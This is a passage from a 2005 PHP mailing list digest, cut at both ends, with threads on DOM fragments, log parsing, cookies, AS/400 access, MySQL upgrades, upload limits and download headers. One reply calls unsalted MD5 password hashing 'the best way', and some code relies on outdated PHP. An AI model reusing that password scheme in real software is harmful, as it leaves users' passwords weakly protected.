d) You might have accidentally posted it someplace else (eg register
for access to our forums, we promise not to use it for blah blah blah,
please tick a box, etc, etc).
--
AdamT
"Justify my text? I'm sorry, but it has no excuse."
attached mail follows:
Alberto,
Thank you for your explanation and your example code. I think this
is how I am going to go forward in allowing my users to input links.
Your time in replying is much appreciated.
Dave
attached mail follows:
Hi,
I've a Problem with the DOM Extension in PHP5. I simply want to create
a DocumentFragment which can be used in ImportNode for Example. I now
that the code beyond may look a little bit strange, but I've
simplyfied it as much as it was possible.
The Code should print the Contents of the the Fragment which is Part
of the DomDocument. When you run this Code you'll see that the Result
is an empty String.
Does anyone has any Idea is this behaviour is correct, or if this
might be a PHP Bug.
If I'm doing something wrong, could you please tell me what's wrong?
Thank you for your Help.
Regards
Tobias
<?php
$xmlData = <<<XMLDATA
<?xml version="1.0" encoding="ISO-8859-1" ?>
<root>
<subElement>content</subElement>
</root>
XMLDATA;
$dom = new DomDocument;
$dom->loadXML( $xmlData );
$dom2 = new DomDocument;
$fragment = $dom2->createDocumentFragment();
foreach( $dom->childNodes AS $node ) {
$newNode = $dom2->importNode( $node, true );
$fragment->appendChild( $newNode );
}
$dom2->appendChild( $fragment );
echo $dom2->saveXML( $fragment );
?>
attached mail follows:
Here is a modified version of the code that you posted that should
explain it.
<?php
$xmlData = <<<XMLDATA
<?xml version="1.0" encoding="ISO-8859-1" ?>
<root>
<subElement>content</subElement>
</root>
XMLDATA;
$dom = new DomDocument;
$dom->loadXML( $xmlData );
$dom2 = new DomDocument;
$fragment = $dom2->createDocumentFragment();
foreach( $dom->childNodes AS $node ) {
$newNode = $dom2->importNode( $node, true );
/** This is the (undocumented?) way to get the value of a text node */
var_dump($newNode->nodeValue);
$fragment->appendChild( $newNode );
/** Now we see what the value of the $fragment is */
var_dump($fragment);
}
$dom2->appendChild( $fragment );
/** Finally, we echo the XML of the new document */
echo $dom2->saveXML();
?>
--
Teach a man to fish...
NEW? | http://www.catb.org/~esr/faqs/smart-questions.html
STFA | http://marc.theaimsgroup.com/?l=php-general&w=2
STFM | http://php.net/manual/en/index.php
STFW | http://www.google.com/search?q=php
LAZY |
http://mycroft.mozdev.org/download.html?name=PHP&submitform=Find+search+plugins
attached mail follows:
-----Original Message-----
From: Bret Hughes
Sent: 01/03/05 18:43
On Tue, 2005-03-01 at 11:44, Sascha Kaufmann wrote:
> $birthday = $day.'.'.$month.'.'.$year;
>
why wouldn't
$birthday = "$day.$month.$year";
work as well.
---------------------------
It would -- which to use is a matter of personal preference.
Cheers!
Mike
To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm
attached mail follows:
Mike Ford wrote:
> -----Original Message-----
> From: Bret Hughes
> Sent: 01/03/05 18:43
>
> On Tue, 2005-03-01 at 11:44, Sascha Kaufmann wrote:
>
>>$birthday = $day.'.'.$month.'.'.$year;
>>
>
>
> why wouldn't
>
> $birthday = "$day.$month.$year";
because it does work aswell
>
> work as well.
> ---------------------------
>
> It would -- which to use is a matter of personal preference.
>
> Cheers!
>
> Mike
>
>
> To view the terms under which this email is distributed, please go to http://disclaimer.leedsmet.ac.uk/email.htm
attached mail follows:
Please note that my name is DAN TAPPIN not DAN TRAINOR
<infohostinthebox.net>. Although our last names start with the same
letter you will note that the following characters and our email
addresses are different.
Please double check your facts before you open your big fat ranting
mouths.
Dan Tappin (The list member formerly known as Dan T)
Side Note:
I could really give a rats-a** if Dan Trainor hosts adult material. If
the subjects are of age then get over it. They are adults - they made
their choices. There is a little thing here called personal
responsibility. Why do some people insist on trying to save everyone
from themselves and force morality down everyones throat?
On Mar 1, 2005, at 7:36 PM, Rory Browne wrote:
> Dan
> I think you could have handled this better. I don't have a problem
> with your choice of business, provided you aren't exploiting, forcing,
> or underpaying, your 'content-sources'. On the other hand I resent the
> way you've spoken to friends of mine. Also from looking through your
> responses, I note a hint of hypocracy.
>
> In future I suggest showing respect, to people who in the communitys
> view have earned it, until such time as you have built up the
> credability to do otherwise.
>
> Suggestion - figure out what you want, STFW, and if you can't find
> what you need, get someone to program it.
>
>
>
> On Tue, 1 Mar 2005 13:53:32 -0700, Dan Tappin <danorourke.ca> wrote:
>> What about using a simple session database to ensure multiple logins
>> are not allowed. You can create a session, store the session ID in
>> mysql. If the same user tries to login again from a different
>> location
>> i.e. new session ID you can lock them out / log this activity.
>>
>> You really can't prevent the shared password issue unless you billed
>> on
>> a per login basis. The bottom line is that you end up accepting that
>> you grant access to a user you give up controlling the sharing. You
>> can only prevent multiple login's which is pretty good. It really
>> does
>> not matter if two people use the site 12 hours per day or one 24 hours
>> per day.
>>
>> You can track IP's to look for suspected sharing i.e. use ARIN / RIPE
>> look-ups and see if the same user log's in from multiple subnets. I
>> would think that this would be quite easy with PHP and a MySQL type
>> log.
>>
>> Do your best to limit abuse and move on.
>>
>> Dan T
>>
>> --
>> PHP General Mailing List (http://www.php.net/)
>> To unsubscribe, visit: http://www.php.net/unsub.php
>>
>>
>
attached mail follows:
The best way is to not store the password at all.
Store a hash of the password like this:
INSERT INTO users SET pass = MD5('password');
Now not knowing how you authenticate those passwords this might not
work.
If it's an internal web page via PHP all you do is MD5 the users
supplied password and compare to you DB.
Dan Tappin (The other Dan T)
On Mar 1, 2005, at 5:09 PM, Rob Tanner wrote:
> WE have a number of PHP webpages that access one of several MySql
> databases
> and while the PHP files that contain the passwords cannot be accessed
> via the
> web, we are becoming increasingly concerned over the possibility of
> other
> webpage maintainers viewing those files. How have other folks
> protected
> database passwords needed by PHP apps?
>
> Thanks.
attached mail follows:
Dan Tappin <mailto:danorourke.ca>
on Wednesday, March 02, 2005 7:32 AM said:
> The best way is to not store the password at all.
>
> Store a hash of the password like this:
>
> INSERT INTO users SET pass = MD5('password');
>
> Now not knowing how you authenticate those passwords this might not
> work.
>
> If it's an internal web page via PHP all you do is MD5 the users
> supplied password and compare to you DB.
But that doesn't help in this situation because the OP is not referring
to passwords for users of the website but rather the password(s) for
MySQL so that the application can access the db.
Chris.
attached mail follows:
Rob Tanner wrote:
> We're a four year college. Some maintainers are faculty, some are
> staff and some are work-study (students) and centrally we have little
> say over who can and can't.
You can put super crucial username/passwords into httpd.conf or
root-readable files that get included into httpd.conf
Other than that, the basic rule to remember is:
If PHP can read the password, so can anybody with a login.
If that's not acceptable for that password, you have very few options:
Move it to httpd.conf
Get rid of that user
Maybe you need to re-structure your server and its access levels to
reflect reality.
You probably trust faculty/staff more than students in terms of
intentional abuse.
Though naivete and ignorance might go the other way 'round. :-)
You *could* run two pools of Apache servers, with two different configs,
and two different PHP users, and give different User/Group settings in the
two different httpd.conf files to separate your faculty/staff from your
students.
Though it might be cheaper to just buy a stock Linux box and move all the
students to that box -- where you simply accept the fact that students are
going to mess it up more than the faculty/staff box.
At any rate, the problem is simply not solvable by PHP, and, when you get
right down to it, not even in the PHP realm.
Whatever trust level you have or don't have, the database passwords being
readable by untrusted users who have logins is lower on the problem stack
than a zillion other nasty things they can do if they have a login and you
don't trust them.
Fixing the passwords may well have looked like the easiest one to tackle,
but it's not that easy at all, and you won't improve your general security
health level even if it *was* something easy to fix, as the perpetrators
would simply turn aside from db access and do more... interesting...
things with their logins.
PS Finding a perpetrator and penalizing them harshly and publicly may wake
up some students to the risks of what they are doing. Or not... Worth
considering.
--
Like Music?
http://l-i-e.com/artists.htm
attached mail follows:
Our mailserver writes a logfile every day, but it takes hours to analyse it
manualy.
I (newby) am trying to write a php script that reads the the logfile line by
line and try to get a top 50 of spammers/clients that mail too much...
I can get line by line all information like email-adres, from , to , bytes
send , but how to store it in a array ?
If a line is read and the emailadres already pressent in the array, it
should not ad this emailadress again, but add a counter +1
In the end i want an array containing all emailadreses and how often they
were counted.
This is how far i get: (sorry, it is in Dutch)
It shows all from and to emailadresses. Not bad for a newby, but it took one
week to do.....
<?php
$fp="";$line="";$aantal=0;
echo "<TABLE BORDER=3>";
echo "<TR><TD ALIGN=\"center\"> From:</TD><TD
ALIGN=\"center\">To:</TD></TR>";
if($fp = fopen("C:\smtp\SMTP-Activity-050226.log","r")) {
while (!feof ($fp)) {
$line = fgets($fp, 4096);
if(strstr($line,"SMTP-IN")) {
if(strstr($line,"MAIL FROM" )) {
$aantal++;
$start=strpos($line,"<");
$end=strpos($line,">");
$from=str_replace(">", " ", str_replace("<", " ",
substr($line,$start,$end-$start)));
echo "<TR><TD>".$from."</TD>";
}
if(strstr($line,"RCPT TO" )) {
$start=strpos($line,"<");
$end=strpos($line,">");
echo "<TD>" . str_replace(">", " ", str_replace("<", " ",
substr($line,$start,$end-$start)))."</TD>";
}
}
}
echo "</TR></TABLE>";
fclose($fp);
}
echo "Totaal aantal: $aantal <BR>";
?>
attached mail follows:
woldhekkie wrote:
> Our mailserver writes a logfile every day, but it takes hours to analyse
> it
> manualy.
>
> I (newby) am trying to write a php script that reads the the logfile line
> by
> line and try to get a top 50 of spammers/clients that mail too much...
>
> I can get line by line all information like email-adres, from , to , bytes
> send , but how to store it in a array ?
> If a line is read and the emailadres already pressent in the array, it
> should not ad this emailadress again, but add a counter +1
>
> In the end i want an array containing all emailadreses and how often they
> were counted.
>
> This is how far i get: (sorry, it is in Dutch)
> It shows all from and to emailadresses. Not bad for a newby, but it took
> one
> week to do.....
>
> <?php
> $fp="";$line="";$aantal=0;
$emails = array(); //maybe use $froms = array(); $tos = array();
> echo "<TABLE BORDER=3>";
> echo "<TR><TD ALIGN=\"center\"> From:</TD><TD
> ALIGN=\"center\">To:</TD></TR>";
> if($fp = fopen("C:\smtp\SMTP-Activity-050226.log","r")) {
> while (!feof ($fp)) {
> $line = fgets($fp, 4096);
> if(strstr($line,"SMTP-IN")) {
> if(strstr($line,"MAIL FROM" )) {
> $aantal++;
> $start=strpos($line,"<");
> $end=strpos($line,">");
> $from=str_replace(">", " ", str_replace("<", " ",
> substr($line,$start,$end-$start)));
$emails[$from]++; //maybe use $froms[$email]++;
//Fancier version:
$emails[$from] = isset($emails[$from]) ? $emails[$from] + 1 : 1;
> echo "<TR><TD>".$from."</TD>";
> }
> if(strstr($line,"RCPT TO" )) {
> $start=strpos($line,"<");
> $end=strpos($line,">");
//Same pattern as above
$to = str_replace(">", " ", str_replace("<", " ",
substr($line,$start,$end-$start)));
$emails[$to]++;
> echo "<TD>" . str_replace(">", " ", str_replace("<", " ",
> substr($line,$start,$end-$start)))."</TD>";
> }
> }
> }
> echo "</TR></TABLE>";
> fclose($fp);
> }
> echo "Totaal aantal: $aantal <BR>";
echo "Top 10:<table>";
arsort($emails);
reset($emails);
for ($i = 0; $i < 10; $i++){
list($email, $count) = each($emails);
echo "<tr><td align='right'>$email</td><td
align='right'>$count</td></tr>\n";
}
echo "</table>";
//If you want $froms/$tos separate, copy/paste code above and do it for both
> ?>
--
Like Music?
http://l-i-e.com/artists.htm
attached mail follows:
----- Original Message -----
From: "yangshiqi" <yangshiqi3721.com>
To: "'Tom Whitbread'" <tomretinalnerve.com>; "'php-general lists'"
<php-generallists.php.net>
Sent: Wednesday, March 02, 2005 4:36 AM
Subject: RE: [PHP] Setting cookie on first visit
> When the user first visits your site, there is no skin in your cookie.
> Then
> you can give a default value. And after the user modifies his/her profile,
> you can set it to the cookie. So I don't think it is a problem of setting
> cookie.
>
>
> Best regards,
> Yang Shiqi
>
>
>
>
> -----Original Message-----
> From: Tom Whitbread [mailto:tomretinalnerve.com]
> Sent: Wednesday, March 02, 2005 5:18 PM
> To: php-general lists
> Subject: [PHP] Setting cookie on first visit
>
> I am using a cookie to detect what skin a user wants to display. The
> problem is if a user visits the site for the first time the cookie is
> not being set. I am detecting if its being set or not with
>
> if(!isset($_COOKIE['skin'])){ ... }
>
> It's not setting the cookie untill a user refreshes the page once. How
> can I ensure it's set when it hasnt been set before?
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
attached mail follows:
Hello!
Is there anyone who has some experience in connecting to a IBM AS/400
server with PHP? Any ideas where to start?
Regards,
Frank
________________________________________________
Frank Arensmeier
Marketing Support
NIKE HYDRAULICS AB
Box 1107
631 80 Eskilstuna
Sweden
tel +46 16 82 34
fax +46 16 13 93 16
email: frank.arensmeiernikehydraulics.se
www.nikehydraulics.com
attached mail follows:
Frank Arensmeier wrote:
> Is there anyone who has some experience in connecting to a IBM AS/400
> server with PHP? Any ideas where to start?
I know somebody reported success back in the day on this list...
Actually, it's so far back in the day, it just might be on the predecessor
to this list, back when all PHP discussion took place pretty much on one
single list... But I don't think it's *that* far back.
Worst case, we're talking back in PHP 3.0 Beta/Release Candidate days,
possibly, but not before, as that's when I joined up.
I think they were using "AS400" or "AS 400" without the "/" in their posts.
IIRC (and that's a big "IF"):
They originally had nothing, then they got read access, then they achieved
write access, finally, but I think there was something really skanky about
getting the write access that made them not real happy with the
solution... Like I think it required having "root" be a bit too wide open
permissive on the AS/400 end.
Fortunately, the list archives of this list and even that old list are
linked from:
http://php.net/mailing-lists.php
Start with the PHP-General, as I suspect it's in there, though it *could*
be back in the old old list.
PS I'm assuming you want to connect to "the database" on an AS/400 and
that that database is the standard and only database that shipped on those
suckers. P-something, right?
PPS You'd probably be best off getting a CSV dump and migrating to
hardware/OS less, shall we say, antiquated? :-)
PPPS I'm not sure if I've ever *seen* an AS/400, so this is definitely
highly suspect info in this post.
--
Like Music?
http://l-i-e.com/artists.htm
attached mail follows:
Richard, you are my man! Thank you for the hints you gave me. I will do
some digging in the list archives tonight.
Thank you.
/frank
2005-03-02 kl. 19.57 skrev Richard Lynch:
> Frank Arensmeier wrote:
>> Is there anyone who has some experience in connecting to a IBM AS/400
>> server with PHP? Any ideas where to start?
>
> I know somebody reported success back in the day on this list...
>
> Actually, it's so far back in the day, it just might be on the
> predecessor
> to this list, back when all PHP discussion took place pretty much on
> one
> single list... But I don't think it's *that* far back.
>
> Worst case, we're talking back in PHP 3.0 Beta/Release Candidate days,
> possibly, but not before, as that's when I joined up.
>
> I think they were using "AS400" or "AS 400" without the "/" in their
> posts.
>
> IIRC (and that's a big "IF"):
> They originally had nothing, then they got read access, then they
> achieved
> write access, finally, but I think there was something really skanky
> about
> getting the write access that made them not real happy with the
> solution... Like I think it required having "root" be a bit too wide
> open
> permissive on the AS/400 end.
>
> Fortunately, the list archives of this list and even that old list are
> linked from:
> http://php.net/mailing-lists.php
>
> Start with the PHP-General, as I suspect it's in there, though it
> *could*
> be back in the old old list.
>
> PS I'm assuming you want to connect to "the database" on an AS/400 and
> that that database is the standard and only database that shipped on
> those
> suckers. P-something, right?
>
> PPS You'd probably be best off getting a CSV dump and migrating to
> hardware/OS less, shall we say, antiquated? :-)
>
> PPPS I'm not sure if I've ever *seen* an AS/400, so this is definitely
> highly suspect info in this post.
>
> --
> Like Music?
> http://l-i-e.com/artists.htm
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
>
attached mail follows:
According to Larry Hotchkiss on Jan 31,2001
<Quote>
Its my understanding that you use the odbc functions to access db/2
400. I also recall reading that the db2/400 functionality is true db2
functionality and does not use the generic odbc layer even though it is
grouped in. Apparently its smart enough to know. Depending on where you
got your windows ver of php, you should just be able to uncomment the
line in your php.ini so it can use odbc and make sure the extension path
is set correctly.
<end Quote>
--
<?php
/*
Stephen Johnson c | eh
The Lone Coder
http://www.thelonecoder.com
stephenthelonecoder.com
562.924.4454 (office)
562.924.4075 (fax)
continuing the struggle against bad code
*/
?>
> From: "Richard Lynch" <ceol-i-e.com>
> Reply-To: ceol-i-e.com
> Date: Wed, 2 Mar 2005 10:57:30 -0800 (PST)
> To: "Frank Arensmeier" <frank.arensmeiernikehydraulics.se>
> Cc: "php list general" <php-generallists.php.net>
> Subject: Re: [PHP] Connecting to a AS/400?
>
> Frank Arensmeier wrote:
>> Is there anyone who has some experience in connecting to a IBM AS/400
>> server with PHP? Any ideas where to start?
>
> I know somebody reported success back in the day on this list...
>
> Actually, it's so far back in the day, it just might be on the predecessor
> to this list, back when all PHP discussion took place pretty much on one
> single list... But I don't think it's *that* far back.
>
> Worst case, we're talking back in PHP 3.0 Beta/Release Candidate days,
> possibly, but not before, as that's when I joined up.
>
> I think they were using "AS400" or "AS 400" without the "/" in their posts.
>
> IIRC (and that's a big "IF"):
> They originally had nothing, then they got read access, then they achieved
> write access, finally, but I think there was something really skanky about
> getting the write access that made them not real happy with the
> solution... Like I think it required having "root" be a bit too wide open
> permissive on the AS/400 end.
>
> Fortunately, the list archives of this list and even that old list are
> linked from:
> http://php.net/mailing-lists.php
>
> Start with the PHP-General, as I suspect it's in there, though it *could*
> be back in the old old list.
>
> PS I'm assuming you want to connect to "the database" on an AS/400 and
> that that database is the standard and only database that shipped on those
> suckers. P-something, right?
>
> PPS You'd probably be best off getting a CSV dump and migrating to
> hardware/OS less, shall we say, antiquated? :-)
>
> PPPS I'm not sure if I've ever *seen* an AS/400, so this is definitely
> highly suspect info in this post.
>
> --
> Like Music?
> http://l-i-e.com/artists.htm
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
attached mail follows:
You need to clearer on 'connecting to' .
Do you mean FTP, MySQL etc???
Dan Tappin
On Mar 2, 2005, at 8:54 AM, Frank Arensmeier wrote:
> Hello!
>
> Is there anyone who has some experience in connecting to a IBM AS/400
> server with PHP? Any ideas where to start?
>
> Regards,
>
> Frank
> ________________________________________________
> Frank Arensmeier
> Marketing Support
>
> NIKE HYDRAULICS AB
> Box 1107
> 631 80 Eskilstuna
> Sweden
>
> tel +46 16 82 34
> fax +46 16 13 93 16
> email: frank.arensmeiernikehydraulics.se
> www.nikehydraulics.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
attached mail follows:
Hi,
i'm thinking of updating my mysql-server from 3.23 to 4.1.10, and i
can't find any serious information if i would have to rebuild php too.
anybody tryed this already??
system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52
thanks peter
attached mail follows:
Hi,
i'm thinking of updating my mysql-server from 3.23 to 4.1.10, and i
can't find any serious information if i would have to rebuild php too.
anybody tryed this already??
system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52
thanks peter
attached mail follows:
Peter wrote:
> Hi,
>
> i'm thinking of updating my mysql-server from 3.23 to 4.1.10, and i
> can't find any serious information if i would have to rebuild php too.
>
> anybody tryed this already??
>
> system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52
>
> thanks peter
>
Please don't spam the list with multiple messages asking the same question.
Before you 'upgrade', ask youself, "Do I need to upgrade?".
What features do you need in 4.1.x that are not present in 3.x?
If the answer to that is 'none', you're probably better off leaving it
alone. If you still fell you _have_ to upgrade, think about using the
4.0.x version instead of 4.1.x. If you 'upgrade' to MySQL 4.1.x, and
don't go with PHP5, you really haven't done anything for your apps, as
you won't be able to take advantage of some of the new features.
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
johnkegworks.com
attached mail follows:
sorry, i googled again, read nearly every post wich containes mysql and
upgrade but i can't find a useful answer in this list. perhaps its me...
so my question is still the same, would i have to recompile php or not
peter
NG
what means need?
nobody needs an internet,using mysql4 would just makes things easier
(like using nested SELECTS)
... shure there is a lot of spam at the list, i did not asked for
"reasons for an upgrade" because i already knew about that, so the next
one who is googling for the problem, gets annoyed of the unuseful answer
John Nichel schrieb:
> Peter wrote:
>
>> Hi,
>>
>> i'm thinking of updating my mysql-server from 3.23 to 4.1.10, and i
>> can't find any serious information if i would have to rebuild php too.
>>
>> anybody tryed this already??
>>
>> system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52
>>
>> thanks peter
>>
>
> Please don't spam the list with multiple messages asking the same question.
>
> Before you 'upgrade', ask youself, "Do I need to upgrade?".
>
> What features do you need in 4.1.x that are not present in 3.x?
>
> If the answer to that is 'none', you're probably better off leaving it
> alone. If you still fell you _have_ to upgrade, think about using the
> 4.0.x version instead of 4.1.x. If you 'upgrade' to MySQL 4.1.x, and
> don't go with PHP5, you really haven't done anything for your apps, as
> you won't be able to take advantage of some of the new features.
>
attached mail follows:
Peter wrote:
> sorry, i googled again, read nearly every post wich containes mysql and
> upgrade but i can't find a useful answer in this list. perhaps its me...
>
> so my question is still the same, would i have to recompile php or not
No, you don't. However, mysql >= 4.1 uses new authentication protocol,
read http://dev.mysql.com/doc/mysql/en/old-client.html
attached mail follows:
Peter wrote:
> sorry, i googled again, read nearly every post wich containes mysql and
> upgrade but i can't find a useful answer in this list. perhaps its me...
>
> so my question is still the same, would i have to recompile php or not
>
> peter
>
> NG
> what means need?
> nobody needs an internet,using mysql4 would just makes things easier
> (like using nested SELECTS)
>
> ... shure there is a lot of spam at the list, i did not asked for
> "reasons for an upgrade" because i already knew about that, so the next
> one who is googling for the problem, gets annoyed of the unuseful answer
>
Well then far beit from me to try and help in a manner that is
unacceptable to you. Maybe I should just go back to my standard answer...
http://www.google.com/search?q=php+upgrade+mysql+4.1
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
johnkegworks.com
attached mail follows:
I recommend Mambo or Geeklog. They aren't overdone and pretty easy to
implement. Best of all, they are free.
Jud.
Judson Vaughn
judseitervaughn.com | judbizville.com
Seiter Vaughn Communications
12455 Plowman Court
Herndon, VA 20170
703.450.9740
svc
Kostyantyn Shakhov wrote:
> I've got an order for the media portal. Thus, I'm looking for an open
> source portal systems. First that comes to my mind is PHP-Nuke, but I
> heared that it requires a powerful server and i'll have just a
> middle-level one. So, could someone knows another PHP-based open
> source portal systems? Thank you in advance.
>
attached mail follows:
Hi,
I am trying to modify the php.ini settings for post_max_size and upload_max_filesize to allow for a custom script to upload files larger than 8MB, the default size limit set in php.ini. This is on a shared server, and my hosting company won't modify the limitation, although they will charge me $50/hr to code a custom script. Whatever! I'll just do it myself... but I don't know how.
Also, http://docs.php.net/en/function.ini-set.html tells me that for post_max_size and upload_max_filesize: "Entry can be set in php.ini, .htaccess or httpd.conf."
Any help would be greatly appreciated!!
Thanks,
Matt Cassarino
Cell: (206) 484-4626
Web: www.mattcass.com
Email: mcmattcass.com
attached mail follows:
From: Ian Firla <ifirla
aegissrl.it>
To: Matt Cassarino <mc
mattcass.com>
Cc: php-general
lists.php.net
Content-Type: text/plain
Date: Wed, 02 Mar 2005 19:44:24 +0100
Message-Id: <1109789064.8823.19.camel
localhost.localdomain>
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Subject: Re: [PHP] Bypassing php.ini setting for file uploads?
There're all kinds of threads on this if you google around for a bit but
one good on in my bookmarks is:
http://www.webdevforums.com/showthread.php?tr31
Ian
On Wed, 2005-03-02 at 09:39 -0800, Matt Cassarino wrote:
>Hi,
>
>I am trying to modify the php.ini settings for post_max_size and upload_max_filesize to allow for a custom script to upload files larger than 8MB, the default size limit set in php.ini. This is on a shared server, and my hosting company won't modify the limitation, although they will charge me $50/hr to code a custom script. Whatever! I'll just do it myself... but I don't know how.
>
>Also, http://docs.php.net/en/function.ini-set.html tells me that for post_max_size and upload_max_filesize: "Entry can be set in php.ini, .htaccess or httpd.conf."
>
>Any help would be greatly appreciated!!
>
>Thanks,
>
>Matt Cassarino
>Cell: (206) 484-4626
>Web: www.mattcass.com
>Email: mcmattcass.com
attached mail follows:
Matt Cassarino wrote:
> I am trying to modify the php.ini settings for post_max_size and
> upload_max_filesize to allow for a custom script to upload files larger
> than 8MB, the default size limit set in php.ini. This is on a shared
> server, and my hosting company won't modify the limitation, although they
> will charge me $50/hr to code a custom script. Whatever! I'll just do it
> myself... but I don't know how.
>
> Also, http://docs.php.net/en/function.ini-set.html tells me that for
> post_max_size and upload_max_filesize: "Entry can be set in php.ini,
> .htaccess or httpd.conf."
Some Good News
You can create a file named ".htaccess" in the same directory as your file
upload script, and put this in it:
php_value post_max_size 32M
php_value upload_max_filesize 32M
Use any valid value you like instead of 32M of course.
Yes, there really *should* be a dot (.) at the front of the filename:
.htaccess
Your FTP software and your desktop machine may give you grief about it,
but the web-server *needs* it to be that name.
If you already have an .htaccess file with other stuff in it, which you
may or may not understand, just add the above lines at the bottom.
Their custom script would have to do this exact same thing to make it
work, so there ain't much point to giving them $50/hr for that. :-)
Some Bad News
Your web host *might* have .htaccess turned "off" for performance reasons,
in which case you are screwed.
It's unlikely, but possible.
They ain't gonna turn .htaccess "on" just for you, because then it's "on"
for everybody and slows down the server a little bit.
And they probably won't even change the settings for max_XYZ in httpd.conf
for you, not even for $50. If by some chance they *will* do that, it's a
2-minute job, so don't let them charge you more than $50 for that!
--
Like Music?
http://l-i-e.com/artists.htm
attached mail follows:
I try to download a file wit follow code:
$len = filesize($file);
$filename = basename($file);
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: public");
header("Content-Description: File Transfer");
header("Content-Type: $ctype");
$header="Content-Disposition: attachment; filename=".$filename.";";
header($header );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".$len);
readfile($file);
exit;
All works pretty well, the filename is correct, the Content Type and the
file size.
When I try to open the downloaded file I see nothing.
The source file on the web server works great.
I played with Content-Transfer-Encoding and tried all values from the RFC
Any ideas?
thank you
attached mail follows:
Werner Jäger wrote:
> I try to download a file wit follow code:
>
> $len = filesize($file);
> $filename = basename($file);
> header("Pragma: public");
> header("Expires: 0");
> header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
> header("Cache-Control: public");
Is it kosher to have two Cache-Control headers?...
More important, do the browsers actually follow the spec if it *IS* kosher.
I'd sure try to get rid of one of these.
> header("Content-Description: File Transfer");
> header("Content-Type: $ctype");
What's $ctype?
It *SHOULD* be "application/octet-stream" if you want to force a download.
> $header="Content-Disposition: attachment; filename=".$filename.";";
> header($header );
> header("Content-Transfer-Encoding: binary");
> header("Content-Length: ".$len);
> readfile($file);
> exit;
>
>
> All works pretty well, the filename is correct, the Content Type and the
> file size.
Is $file a FULL pathname to the file, starting from /, such as:
/usr/home/full/path/to/file.txt
*NOT* just from DocumentRoot or the current directory?
While I would expect filesize and readfile to behave the same, I'd say
*always* use full path for both.
> When I try to open the downloaded file I see nothing.
I'm assuming the file size is not 0, which would mean that technically
everything is working fine, given what you have described :-)
> The source file on the web server works great.
If you want to force a download, use:
header("Content-type: application/octet-stream");
Every browser ever made knows that means "download"
&g